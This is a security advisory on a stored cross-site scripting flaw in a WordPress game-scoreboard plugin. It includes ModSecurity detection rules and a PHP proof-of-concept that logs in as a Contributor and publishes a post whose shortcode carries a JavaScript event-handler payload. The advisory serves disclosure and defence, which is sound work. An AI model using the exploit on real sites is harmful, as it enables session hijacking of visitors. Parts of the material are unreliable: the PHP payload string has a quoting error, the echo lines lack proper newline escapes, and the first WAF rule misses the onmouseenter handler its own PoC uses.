Atomic Edge analysis of CVE-2026-4083 (metadata-based):
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Scoreboard for HTML5 Games Lite WordPress plugin, affecting versions up to and including 1.2. The vulnerability exists in the plugin’s ‘scoreboard’ shortcode handler, which insufficiently validates HTML attributes before rendering them within an iframe element. Attackers with Contributor-level access or higher can inject malicious scripts that execute when a user views a compromised page.
Atomic Edge research identifies the root cause as improper input neutralization within the sfhg_shortcode() function. The function accepts arbitrary HTML attributes for the rendered iframe, applying only a minimal blacklist of four specific attribute names (same_height_as, onload, onpageshow, onclick). While attribute names pass through esc_html() and values through esc_attr(), these escaping functions do not prevent injection of JavaScript event handlers like onfocus or onmouseover. The shortcode text persists in post_content, bypassing WordPress’s kses filtering which occurs before shortcode expansion during page rendering. These conclusions are inferred from the CWE classification and vulnerability description, as source code confirmation is unavailable.
Exploitation requires Contributor-level authentication to create or edit posts containing the malicious shortcode. Attackers embed the [scoreboard] shortcode with crafted event handler attributes containing JavaScript payloads. For example: [scoreboard onmouseover=”alert(document.cookie)” src=”https://example.com/game.html”]. When any user views the post, the plugin renders an iframe with the injected attribute, executing the payload upon the specified event trigger. The attack vector operates entirely through the WordPress post editor interface.
Proper remediation requires implementing an allowlist approach for iframe attributes instead of the ineffective blacklist. The patched version (1.3) likely validates attribute names against a predefined set of safe attributes (src, width, height, etc.) before rendering. Additionally, the plugin should sanitize attribute values more rigorously, potentially using wp_kses() with custom allowed HTML rules for iframe elements. These measures would prevent injection of unauthorized event handlers while maintaining legitimate shortcode functionality.
Successful exploitation allows authenticated attackers with at least Contributor privileges to execute arbitrary JavaScript in the context of any user viewing the compromised page. This enables session hijacking, administrative actions through CSRF, defacement via DOM manipulation, and data exfiltration from authenticated users. The stored nature means payloads execute repeatedly without further attacker interaction, amplifying potential damage. The CVSS score of 6.4 reflects medium severity with scope change (S:C) due to impact beyond the vulnerable component.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-4083 (metadata-based)
# This rule blocks exploitation attempts via WordPress post editor submissions containing malicious scoreboard shortcode attributes.
# The rule targets POST requests to wp-admin/post.php with specific shortcode patterns containing JavaScript event handlers.
SecRule REQUEST_URI "@endsWith /wp-admin/post.php"
"id:20264083,phase:2,deny,status:403,chain,msg:'CVE-2026-4083: Scoreboard for HTML5 Games Lite Stored XSS via Shortcode',severity:'CRITICAL',tag:'CVE-2026-4083',tag:'WordPress',tag:'Plugin/scoreboard-for-html5-game-lite',tag:'attack-xss'"
SecRule REQUEST_METHOD "@streq POST" "chain"
SecRule ARGS_POST:content "@rx \[scoreboard[^\]]*on(click|dblclick|focus|blur|change|select|submit|keydown|keypress|keyup|mousedown|mousemove|mouseout|mouseover|mouseup|load|unload|error|resize|scroll)\s*=""
"t:none,t:urlDecodeUni,t:htmlEntityDecode,capture,setvar:'tx.cve_2026_4083_score=+1'"
# Secondary rule for detecting encoded event handlers
SecRule REQUEST_URI "@endsWith /wp-admin/post.php"
"id:20264084,phase:2,deny,status:403,chain,msg:'CVE-2026-4083: Scoreboard for HTML5 Games Lite Stored XSS via Encoded Shortcode Attributes',severity:'CRITICAL',tag:'CVE-2026-4083',tag:'WordPress',tag:'Plugin/scoreboard-for-html5-game-lite',tag:'attack-xss'"
SecRule REQUEST_METHOD "@streq POST" "chain"
SecRule ARGS_POST:content "@rx \[scoreboard[^\]]*\bon\w+\s*\x3a"
"t:none,t:urlDecodeUni,t:htmlEntityDecode"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4083 - Scoreboard for HTML5 Games Lite <= 1.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes
<?php
$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_password';
// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $login_url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_COOKIEJAR => 'cookies.txt',
CURLOPT_COOKIEFILE => 'cookies.txt',
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query([
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
])
]);
$response = curl_exec($ch);
// Step 2: Create a new post with malicious shortcode
// Assumption: Contributor users can create posts via wp-admin/post-new.php
$new_post_url = $target_url . '/wp-admin/post-new.php';
curl_setopt_array($ch, [
CURLOPT_URL => $new_post_url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_REFERER => $login_url
]);
$response = curl_exec($ch);
// Extract nonce from post creation page (simplified - actual implementation would parse HTML)
// For demonstration, we assume a valid nonce is obtained
$nonce = 'extracted_nonce_here';
// Step 3: Submit post with XSS payload in shortcode
// Payload uses onmouseenter event handler to trigger when user hovers over iframe
$save_post_url = $target_url . '/wp-admin/post.php';
$post_content = '[scoreboard src="https://example.com/game.html" width="600" height="400" onmouseenter="alert('XSS via CVE-2026-4083');" data-custom="allowed_attribute"]';
curl_setopt_array($ch, [
CURLOPT_URL => $save_post_url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query([
'post_title' => 'Game Scoreboard',
'content' => $post_content,
'publish' => 'Publish',
'post_type' => 'post',
'_wpnonce' => $nonce,
'post_status' => 'publish'
])
]);
$response = curl_exec($ch);
// Step 4: Verify payload persists by checking post content
if (strpos($response, 'onmouseenter') !== false) {
echo "[+] XSS payload successfully injected via shortcode.n";
echo "[+] Visit the published post to trigger the onmouseenter event.n";
} else {
echo "[-] Payload injection may have failed.n";
}
curl_close($ch);
unlink('cookies.txt');
?>
